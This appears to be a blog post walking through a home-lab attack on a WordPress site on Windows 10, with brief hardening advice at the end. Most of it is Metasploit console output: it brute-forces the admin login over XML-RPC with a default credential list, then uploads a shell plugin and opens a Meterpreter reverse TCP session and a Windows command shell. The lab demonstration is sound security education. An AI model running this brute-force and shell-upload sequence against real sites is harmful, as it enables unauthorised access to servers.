OS access though wordpress- Securing your wordpress site

This is done in my personal lab, I carried this out mainly out of curiosity because i fell in love with wordpress because of the simplicity with which websites can be deployed though to be honestly fair probably because i don’t want to do alot of graphics and CSS not to mention the many free plugins.

This was carried out on a Windows 10 system running WAMP and wordpress though i don’t think it being WAMP or Windows 10 have any bearing on this attack though being Windows 10 or higher patched versions means you might not be able to elevate priviledges with simple commands like getsystem e.t.c

My biggest worry with wordpress has always been it’s lack of a password count and lockout mechanism, this makes it very open to login bruteforce attacks and credential username_password files, so i setout to see what metasploit had with reference to these credential scanners and the list is quite interesting, some examples are below;

Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 auxiliary/admin/http/wp_custom_contact_forms 2014-08-07 normal WordPress custom-contact-forms Plugin SQL Upload
 auxiliary/admin/http/wp_easycart_privilege_escalation 2015-02-25 normal WordPress WP EasyCart Plugin Privilege Escalation
 auxiliary/admin/http/wp_wplms_privilege_escalation 2015-02-09 normal WordPress WPLMS Theme Privilege Escalation
 auxiliary/dos/http/wordpress_long_password_dos 2014-11-20 normal WordPress Long Password DoS
 auxiliary/dos/http/wordpress_xmlrpc_dos 2014-08-06 normal WordPress XMLRPC DoS
 auxiliary/gather/wp_all_in_one_migration_export 2015-03-19 normal WordPress All-in-One Migration Export
 auxiliary/gather/wp_ultimate_csv_importer_user_extract 2015-02-02 normal WordPress Ultimate CSV Importer User Table Extract
 auxiliary/gather/wp_w3_total_cache_hash_extract normal WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract
 auxiliary/scanner/http/wordpress_cp_calendar_sqli 2015-03-03 normal WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner
 auxiliary/scanner/http/wordpress_ghost_scanner normal WordPress XMLRPC GHOST Vulnerability Scanner
 auxiliary/scanner/http/wordpress_login_enum normal WordPress Brute Force and User Enumeration Utility
 auxiliary/scanner/http/wordpress_multicall_creds normal WordPress XML-RPC system.multicall Credential Collector
 auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator
 auxiliary/scanner/http/wordpress_scanner normal WordPress Scanner
 auxiliary/scanner/http/wordpress_xmlrpc_login normal WordPress XML-RPC Username/Password Login Scanner
 auxiliary/scanner/http/wp_contus_video_gallery_sqli 2015-02-24 normal WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner
 auxiliary/scanner/http/wp_dukapress_file_read normal WordPress DukaPress Plugin File Read Vulnerability
 auxiliary/scanner/http/wp_gimedia_library_file_read normal WordPress GI-Media Library Plugin Directory Traversal Vulnerability
 auxiliary/scanner/http/wp_mobile_pack_info_disclosure normal WordPress Mobile Pack Information Disclosure Vulnerability
 auxiliary/scanner/http/wp_mobileedition_file_read normal WordPress Mobile Edition File Read Vulnerability
 auxiliary/scanner/http/wp_nextgen_galley_file_read normal WordPress NextGEN Gallery Directory Read Vulnerability
 auxiliary/scanner/http/wp_simple_backup_file_read normal WordPress Simple Backup File Read Vulnerability
 auxiliary/scanner/http/wp_subscribe_comments_file_read normal WordPress Subscribe Comments File Read Vulnerability

— In this example i used; auxiliary/scanner/http/wordpress_xmlrpc_login

msf > use auxiliary/scanner/http/wordpress_xmlrpc_login
msf auxiliary(wordpress_xmlrpc_login) > show options
Module options (auxiliary/scanner/http/wordpress_xmlrpc_login):
Name Current Setting Required Description
 ---- --------------- -------- -----------
 BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
 DB_ALL_CREDS false no Try each user/password couple stored in the current database
 DB_ALL_PASS false no Add all passwords in the current database to the list
 DB_ALL_USERS false no Add all users in the current database to the list
 PASSWORD no A specific password to authenticate with
 PASS_FILE no File containing passwords, one per line
 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
 RHOSTS 192.168.0.1 yes The target address range or CIDR identifier
 RPORT 80 yes The target port
 SSL false no Negotiate SSL/TLS for outgoing connections
 STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host
 TARGETURI /wp yes The base path to the wordpress application
 THREADS 1 yes The number of concurrent threads
 USERNAME no A specific username to authenticate as
 USERPASS_FILE /usr/share/wordlists/metasploit/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line
 USER_AS_PASS false no Try the username as the password for all users
 USER_FILE no File containing usernames, one per line
 VERBOSE true yes Whether to print output for all attempts
 VHOST no HTTP server virtual host
msf auxiliary(wordpress_xmlrpc_login) >
-- Running the xml scanner yielded results (ofcourse i had input the correct username and password in the file but this is a lab ;) )
 msf auxiliary(wordpress_xmlrpc_login) > run

[*] 192.168.0.1:80 :/wp/xmlrpc.php - Sending Hello...
 [+] XMLRPC enabled, Hello message received!
 [*] Starting XML-RPC login sweep...
 [-] WORDPRESS_XMLRPC - Failed: 'connect:connect'
 [-] WORDPRESS_XMLRPC - Failed: 'sitecom:sitecom'
 [-] WORDPRESS_XMLRPC - Failed: 'admin:1234'
 [-] WORDPRESS_XMLRPC - Failed: 'cisco:cisco'
 [-] WORDPRESS_XMLRPC - Failed: 'cisco:sanfran'
 [-] WORDPRESS_XMLRPC - Failed: 'private:private'
 [-] WORDPRESS_XMLRPC - Failed: 'wampp:xampp'
 [-] WORDPRESS_XMLRPC - Failed: 'newuser:wampp'
 [-] WORDPRESS_XMLRPC - Failed: 'xampp-dav-unsecure:ppmax2011 '
 [-] WORDPRESS_XMLRPC - Failed: 'admin:turnkey'
 [-] WORDPRESS_XMLRPC - Failed: 'vagrant:vagrant'
 [+] WORDPRESS_XMLRPC - Success: 'admin:wp'
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 msf auxiliary(wordpress_xmlrpc_login) >

— With the username and password, i needed to gain access to this system so i used the module below;
exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent WordPress Admin Shell Upload

msf exploit(wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 PASSWORD wp yes The WordPress password to authenticate with
 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
 RHOST 192.168.0.1 yes The target address
 RPORT 80 yes The target port
 SSL false no Negotiate SSL/TLS for outgoing connections
 TARGETURI /wp yes The base path to the wordpress application
 USERNAME admin yes The WordPress username to authenticate with
 VHOST no HTTP server virtual host
 Exploit target:

Id Name
 -- ----
 0 WordPress
 msf exploit(wp_admin_shell_upload) >
-- I tried a check to see if i could validate before i do anything but that wasn't allowed for this module;

 msf exploit(wp_admin_shell_upload) > check
 [*] 192.168.0.1:80 This module does not support check.
 msf exploit(wp_admin_shell_upload) >

msf exploit(wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 192.168.0.2:4444
 [*] Authenticating with WordPress using admin:wp...
 [+] Authenticated with WordPress
 [*] Preparing payload...
 [*] Uploading payload...
 [*] Executing the payload at /wp/wp-content/plugins/JhQupUiFGr/EqiugYHZzJ.php...
 [*] Sending stage (33721 bytes) to 192.168.0.1
 [*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:55374) at 2016-12-24 18:18:23 +0300
 [+] Deleted EqiugYHZzJ.php
 [+] Deleted JhQupUiFGr.php

meterpreter > shell
 Process 8780 created.
 Channel 0 created.
 Microsoft Windows [Version 10.0.14393]
 (c) 2016 Microsoft Corporation. All rights reserved.

C:\wamp64\www\wp\wp-content\plugins\JhQupUiFGr>

— Trying to move futher resulted in another error though this demonstration is to show how easy it is to move from a wordpress page that doesn’t have login timeouts to getting shell access;

-- Below is the error i got for example, though in different scenarios all was fine i probably suspect it has to do with Windows 10 security but i didn't dig into this alot more.
 C:\wamp64\www\wp\wp-content\plugins\JhQupUiFGr>cd c:\

Terminate channel 0? [y/N] y
 [-] Error running command shell: Rex::TimeoutError Operation timed out.
 meterpreter >

Migitation

  • Introduce CAPTCHAs in your wordpress site
  • Implement two factor authentication
  • Implement login count plugins

The above makes password guessing and bruteforcing difficult especially by bots and automated tools, there are other ways of gaining access for example the bugs in older versions of wordpress, old versions of templates you use, old versions of plugins you have active and these must be kept current because each latest release has a fix for something you might not be aware of.

Newer versions might also have some vulnerabilities but it is safe to say they are known by a very few and are usually patched the moment plugin/template or the wordpress team knows about them.

 

Advertisements

One thought on “OS access though wordpress- Securing your wordpress site

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s